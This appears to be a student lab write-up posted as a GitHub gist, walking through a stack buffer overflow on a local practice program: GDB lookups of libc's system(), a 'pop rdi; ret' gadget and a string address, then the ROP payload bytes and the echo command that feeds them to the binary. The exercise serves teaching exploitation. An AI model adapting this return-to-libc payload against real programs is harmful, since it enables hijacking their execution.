Skip to content

Instantly share code, notes, and snippets.

@Wachiwi

Wachiwi/ReadMe.md

Last active May 11, 2017 08:46
Show Gist options
  • Save Wachiwi/ec4607af79c478a52249d45219cf1641 to your computer and use it in GitHub Desktop.
Save Wachiwi/ec4607af79c478a52249d45219cf1641 to your computer and use it in GitHub Desktop.
Download ZIP
Praktikum 4
Raw
ReadMe.md

Vorbereitung

Aufgabe 1-3 nach anleitung, kein großer Aufwand

Hinweis: malloc() legt daten auf dem heap ab, wir möchten sie allerdings auf dem stack, daher verwendung von []

4. Analyse und "Reverse"-Engineering

GDB internal commands:

gdb ./a.out
gdb$ b main # Create breakpoint for main function
gdb$ run # Start program
gdb$ info address system # lookup symbols in libc area
Symbol "system" is at 0x7fffff076590 in a file compiled without debugging.
gdb$ find "sl" libc # search for string in namespace libc
Searching for 'sl' in: libc ranges
Found 16 results, display max 16 items:
libc : 0x7fffff041149 --> 0x72637700746f6c73 ('slot')
libc : 0x7fffff04123c ("slog_chk")
libc : 0x7fffff041d4a --> 0x5f4f495f006c6c73 ('sll')
libc : 0x7fffff042296 --> 0x67007265776f6c73 ('slower')
libc : 0x7fffff042a88 --> 0x7473007065656c73 ('sleep')
libc : 0x7fffff042dec --> 0x635f726478006c73 ('sl')       # This one is the left one
libc : 0x7fffff0437aa ("slog_chk")
libc : 0x7fffff043827 --> 0x7773007065656c73 ('sleep')
libc : 0x7fffff04432a --> 0x695f5f006e656c73 ('slen')
libc : 0x7fffff044d71 ("slower_l")
libc : 0x7fffff04589d --> 0x735f5f00676f6c73 ('slog')
libc : 0x7fffff04626b --> 0x6d6d007065656c73 ('sleep')
# Desired address is 0x7fffff042dec
gdb$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400673 : (b'5fc3')  pop rdi; ret

Summary of all relevant information:

0x7fffff076590  # system address
0x7fffff042dec  # sl address
0x00400673      # pop address

5. Overloading the program

Wanted stack:

#0  main () at main.c:11
#1  0x0000000000400673 in __libc_csu_init ()
#2  0x00007fffff076590 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/x86_64-linux-gnu/libc.so.6
#3  0x0000000100000000 in ?? ()
#4  0x00000000004005bd in frame_dummy ()
#5  0x0000000000000000 in ?? ()

General Return-Oriented Programming:

Overflow-String
#1  pop
#2  address of program/gadget that should be executed
#3  address of ns of the gadget

Solution information:

123456789012345678901234            # General overflow (24Chars on windows)
                                    # 8 byte format because 64bit machine
\x73\x06\x40\x00\x00\x00\x00\x00    # POP rdi; ret address in 8 byte format
\xec\x2d\x04\xff\xff\x7f\x00\x00    # sl gadget address in 8 byte format
\x90\x65\x07\xff\xff\x7f\x00\x00    # address of system namespace in 8 byte format

Execute with:

echo -e "123456789012345678901234\x73\x06\x40\x00\x00\x00\x00\x00\xec\x2d\x04\xff\xff\x7f\x00\x00\x90\x65\x07\xff\xff\x7f\x00\x00" | ./a.out
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment